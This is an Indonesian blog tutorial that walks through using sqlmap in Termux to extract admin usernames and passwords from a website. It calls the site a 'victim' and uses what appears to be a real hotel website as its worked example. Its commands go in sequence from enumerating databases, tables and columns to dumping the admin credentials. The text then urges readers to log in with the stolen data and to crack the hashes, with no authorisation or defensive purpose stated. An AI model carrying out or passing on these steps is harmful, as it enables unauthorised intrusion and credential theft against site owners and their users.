Cara mengetahui user dan password website menggunakan Sqlmap di Termux





Halo sobat.
Kali ini saya akan memberikan tutorial cara mendapatkan username dan password sebuah website menggunakan Sqlmap di Termux.
Jika kalian belum memiliki korban/website yang Vuln untuk di inject,silahkan anda menuju cara mencari website Vuln menggunakan Termux.

Siapkan alat tempur Termux nya.
Lalu jalankan tools Sqlmap.
Jika kamu belum install tool Sqlmap nya,silahkan menuju Cara install Sqlmap di Termux.
Jika sudah install,silahkan langsung
ketik perintah:

cd sqlmap
python2 sqlmap.py

Jika sudah,tampilan nya akan seperti gambar dibawah:



Setelah itu.
Ketik perintah:




python2 sqlmap.py -u http://website_korban.com/index.php?id=1 ---dbs

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 --dbs

Lalu tekan Enter.

Gambar:

Perintah diatas adalah untuk mendapatkan nama Database website tersebut.
-u adalah untuk URL website dan --dbs adalah untuk mendapatkan Database nya.

Tunggu hingga proses selesai dan mendapatkan nama Database website nya.

Jika proses selesai dan kita mendapatkan nama Database nya.
Tampilan nya akan seperti gambar dibawah ini:


Setelah mendapat nama Database,sekarang kita mencari tabel yang terdapat pada database tersebut.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D nama_database --tables

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM --tables

Lalu tekan Enter.

Perintah diatas adalah untuk mendapatkan tabel-tabel yang terdapat pada database dbch13_HM.

--tables adalah perintah untuk mendapatkan tabel pada database.
Jika kita mendapatkan tabel nya.
Tampilannya seperti gambar dibawah:


Gambar diatas menunjukkan nama-nama tabel yang terdapat pada database.

Selanjutnya kita akan menggunakan perintah --columns untuk mendapatkan data pada tabel.
Diatas kita sudah mendapatkan tabel admin yang berisi data login admin ke website nya.
Mari kita lanjutkan membuka tabel yg kita inginkan.

Disini saya akan membuka tabel yp_admin untuk mendapatkan data login admin seperti username dan password nya.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin --columns

Lalu Enter.

Jika kita mendapatkan colom pada tabel nya, tampilannya seperti gambar dibawah ini.

Diatas adalah kolom yang terdapat pada tabel yp_admin.

Untuk mendapatkan username dan password yg terdapat pada kolom,kita tinggal mengetikkan perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin -C admin_id,password --dump

Lalu Enter.

--dump adalah perintah untuk mendapatkan data yang terdapat pada kolom tersebut,seperti username dan password.




Jika proses selesai, penampakan nya akan seperti ini.


Kita telah mengetahui username dan password website tersebut,dan kita tinggal login menggunakan data yang kita dapatkan.

Biasanya password yang kita dapatkan masih di HASH.
untuk crack hash sobat bisa cari di Google.

Sekian tutorial kali ini.
Semoga bermanfaat.
Terima kasih.😊

Comments

Popular posts from this blog

TUTORIAL Deface Hack Website untuk Pemula dengan Metode Bypass Admin Terbaru

[FCTCRYPTO] AUTO BYPASS MANUAL FAUCET DAN PTC PENGHASIL LITECOIN LEGIT FREE 2022